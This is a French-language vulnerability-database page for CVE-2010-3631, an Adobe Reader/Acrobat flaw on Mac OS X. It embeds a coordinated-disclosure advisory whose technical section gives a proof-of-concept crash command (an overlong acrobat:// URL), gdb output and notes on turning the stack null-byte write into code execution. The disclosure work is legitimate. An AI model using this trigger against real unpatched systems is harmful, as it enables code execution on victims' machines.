CVE-2010-3631
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Array index error in Adobe Reader and Acrobat 8.x before 8.2.5 and 9.x before 9.4 on Mac OS X allows attackers to execute arbitrary code via unspecified vectors.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Improper Input Validation The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 15212
Date de publication : 2010-10-05 22h00 +00:00
Auteur : Knud & nSense
EDB Vérifié : Yes
nSense Vulnerability Research Security Advisory NSENSE-2010-001
---------------------------------------------------------------
Affected Vendor: Adobe
Affected Product: Adobe Reader 9.3.4 for Macintosh
Platform: OS X
Impact: User assisted code execution
Vendor response: Patch
Credit: Knud / nSense
Description: Adobe Acrobat and Reader are prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Adobe Reader and Acrobat versions prior to and including 9.3.4 and 8.2.4 are affected.
NOTE: This issue only affects Adobe Reader and Acrobat running on Apple Mac OS X
Technical details
---------------------------------------------------------------
terminal 1:
$ gdb --waitfor=AdobeReader
terminal 2:
$ open acrobat://`perl -e 'print "A" x 12000'`
terminal 1:
(gdb) cont
[snip]
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0xc00013d2
0x7ffa0d6a in AcroBundleThreadQuitProc ()
(gdb) set disassembly-flavor intel
(gdb) x/i $pc
0x7ffa0d6a <AcroBundleThreadQuitProc+2608>: mov BYTE PTR
[ebp+eax-0x420],0x0
(gdb) i r ebp eax
ebp 0xbfffe908 0xbfffe908
eax 0x2eea 12010
(gdb)
As can be seen from the above, we control the value in eax (in
this case 12010, the length of the acrobat:// + the 12000 A's).
This allows us to write the null byte anywhere in memory between
ebp-0x420 (0xBFFFE4E8) and the end of the stack.
The behaviour may be leveraged to modify the frame pointer,
changing the execution flow and thus permitting arbitrary code
execution in the context of the user running the program.
Timeline:
Aug 10th Contacted vendor PSIRT
Aug 10th Vendor response. Vulnerability reproduced.
Aug 16th Status update request sent to vendor
Aug 17th Vendor response, still investigating
Sep 2nd Status update request sent to vendor
Sep 3rd Vendor response. Working on fix
Sep 22nd Contacted vendor regarding patch date
Sep 22nd Vendor response. Confirmed patch date.
Sep 23rd Corrected researcher name
Oct 1st Vendor sent CVE identifier CVE-2010-3631
Oct 5th Vendor releases the patch
Oct 6th Advisory published
http://www.nsense.fi http://www.nsense.dk
$$s$$$$s. ,s$$$$s ,S$$$$$s. $$s$$$$s. ,s$$$$s ,S$$$$$s.
$$$ `$$$ ($$( $$$ `$$$ $$$ `$$$ ($$( $$$ `$$$
$$$ $$$ `^$$s. $$$$$$$$$ $$$ $$$ `^$$s. $$$$$$$$$
$$$ $$$ )$$) $$$ $$$ $$$ )$$) $$$
$$$ $$$ ^$$$$$$7 `7$$$$$P $$$ $$$ ^$$$$$$7 `7$$$$$P
D r i v e n b y t h e c h a l l e n g e _
Products Mentioned
Configuraton 0
Adobe>>Acrobat >> Version 8.0
- Adobe>>Acrobat >> Version 8.0 (Open CPE detail)
- Adobe>>Acrobat >> Version 8.0 (Open CPE detail)
Adobe>>Acrobat >> Version 8.1
- Adobe>>Acrobat >> Version 8.1 (Open CPE detail)
Adobe>>Acrobat >> Version 8.1.1
- Adobe>>Acrobat >> Version 8.1.1 (Open CPE detail)
Adobe>>Acrobat >> Version 8.1.2
- Adobe>>Acrobat >> Version 8.1.2 (Open CPE detail)
- Adobe>>Acrobat >> Version 8.1.2 (Open CPE detail)
Adobe>>Acrobat >> Version 8.1.3
- Adobe>>Acrobat >> Version 8.1.3 (Open CPE detail)
- Adobe>>Acrobat >> Version 8.1.3 (Open CPE detail)
Adobe>>Acrobat >> Version 8.1.4
- Adobe>>Acrobat >> Version 8.1.4 (Open CPE detail)
Adobe>>Acrobat >> Version 8.1.5
- Adobe>>Acrobat >> Version 8.1.5 (Open CPE detail)
- Adobe>>Acrobat >> Version 8.1.5 (Open CPE detail)
Adobe>>Acrobat >> Version 8.1.6
- Adobe>>Acrobat >> Version 8.1.6 (Open CPE detail)
Adobe>>Acrobat >> Version 8.1.7
- Adobe>>Acrobat >> Version 8.1.7 (Open CPE detail)
Adobe>>Acrobat >> Version 8.2
- Adobe>>Acrobat >> Version 8.2 (Open CPE detail)
Adobe>>Acrobat >> Version 8.2.1
- Adobe>>Acrobat >> Version 8.2.1 (Open CPE detail)
- Adobe>>Acrobat >> Version 8.2.1 (Open CPE detail)
Adobe>>Acrobat >> Version 8.2.2
- Adobe>>Acrobat >> Version 8.2.2 (Open CPE detail)
Adobe>>Acrobat >> Version 8.2.3
- Adobe>>Acrobat >> Version 8.2.3 (Open CPE detail)
Adobe>>Acrobat >> Version 8.2.4
- Adobe>>Acrobat >> Version 8.2.4 (Open CPE detail)
- Adobe>>Acrobat >> Version 8.2.4 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 8.0
- Adobe>>Acrobat_reader >> Version 8.0 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 8.1
- Adobe>>Acrobat_reader >> Version 8.1 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 8.1.1
- Adobe>>Acrobat_reader >> Version 8.1.1 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 8.1.2
- Adobe>>Acrobat_reader >> Version 8.1.2 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 8.1.4
- Adobe>>Acrobat_reader >> Version 8.1.4 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 8.1.5
- Adobe>>Acrobat_reader >> Version 8.1.5 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 8.1.6
- Adobe>>Acrobat_reader >> Version 8.1.6 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 8.1.7
- Adobe>>Acrobat_reader >> Version 8.1.7 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 8.2
- Adobe>>Acrobat_reader >> Version 8.2 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 8.2.1
- Adobe>>Acrobat_reader >> Version 8.2.1 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 8.2.2
- Adobe>>Acrobat_reader >> Version 8.2.2 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 8.2.3
- Adobe>>Acrobat_reader >> Version 8.2.3 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 8.2.4
- Adobe>>Acrobat_reader >> Version 8.2.4 (Open CPE detail)
Configuraton 0
Adobe>>Acrobat >> Version 9.0
- Adobe>>Acrobat >> Version 9.0 (Open CPE detail)
- Adobe>>Acrobat >> Version 9.0 (Open CPE detail)
Adobe>>Acrobat >> Version 9.1
- Adobe>>Acrobat >> Version 9.1 (Open CPE detail)
- Adobe>>Acrobat >> Version 9.1 (Open CPE detail)
Adobe>>Acrobat >> Version 9.1.1
- Adobe>>Acrobat >> Version 9.1.1 (Open CPE detail)
- Adobe>>Acrobat >> Version 9.1.1 (Open CPE detail)
Adobe>>Acrobat >> Version 9.1.2
- Adobe>>Acrobat >> Version 9.1.2 (Open CPE detail)
Adobe>>Acrobat >> Version 9.1.3
- Adobe>>Acrobat >> Version 9.1.3 (Open CPE detail)
- Adobe>>Acrobat >> Version 9.1.3 (Open CPE detail)
Adobe>>Acrobat >> Version 9.2
- Adobe>>Acrobat >> Version 9.2 (Open CPE detail)
- Adobe>>Acrobat >> Version 9.2 (Open CPE detail)
Adobe>>Acrobat >> Version 9.3
- Adobe>>Acrobat >> Version 9.3 (Open CPE detail)
- Adobe>>Acrobat >> Version 9.3 (Open CPE detail)
Adobe>>Acrobat >> Version 9.3.1
- Adobe>>Acrobat >> Version 9.3.1 (Open CPE detail)
- Adobe>>Acrobat >> Version 9.3.1 (Open CPE detail)
Adobe>>Acrobat >> Version 9.3.2
- Adobe>>Acrobat >> Version 9.3.2 (Open CPE detail)
- Adobe>>Acrobat >> Version 9.3.2 (Open CPE detail)
Adobe>>Acrobat >> Version 9.3.3
- Adobe>>Acrobat >> Version 9.3.3 (Open CPE detail)
Adobe>>Acrobat >> Version 9.3.4
- Adobe>>Acrobat >> Version 9.3.4 (Open CPE detail)
- Adobe>>Acrobat >> Version 9.3.4 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 9.0
- Adobe>>Acrobat_reader >> Version 9.0 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 9.1
- Adobe>>Acrobat_reader >> Version 9.1 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 9.1.1
- Adobe>>Acrobat_reader >> Version 9.1.1 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 9.1.2
- Adobe>>Acrobat_reader >> Version 9.1.2 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 9.1.3
- Adobe>>Acrobat_reader >> Version 9.1.3 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 9.2
- Adobe>>Acrobat_reader >> Version 9.2 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 9.3
- Adobe>>Acrobat_reader >> Version 9.3 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 9.3.1
- Adobe>>Acrobat_reader >> Version 9.3.1 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 9.3.2
- Adobe>>Acrobat_reader >> Version 9.3.2 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 9.3.3
- Adobe>>Acrobat_reader >> Version 9.3.3 (Open CPE detail)
Adobe>>Acrobat_reader >> Version 9.3.4
- Adobe>>Acrobat_reader >> Version 9.3.4 (Open CPE detail)
Références
http://lists.opensuse.org/opensuse-security-announce/2010-10/msg00001.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
http://lists.opensuse.org/opensuse-security-announce/2010-10/msg00006.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14195
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
2025©
tesweb SA
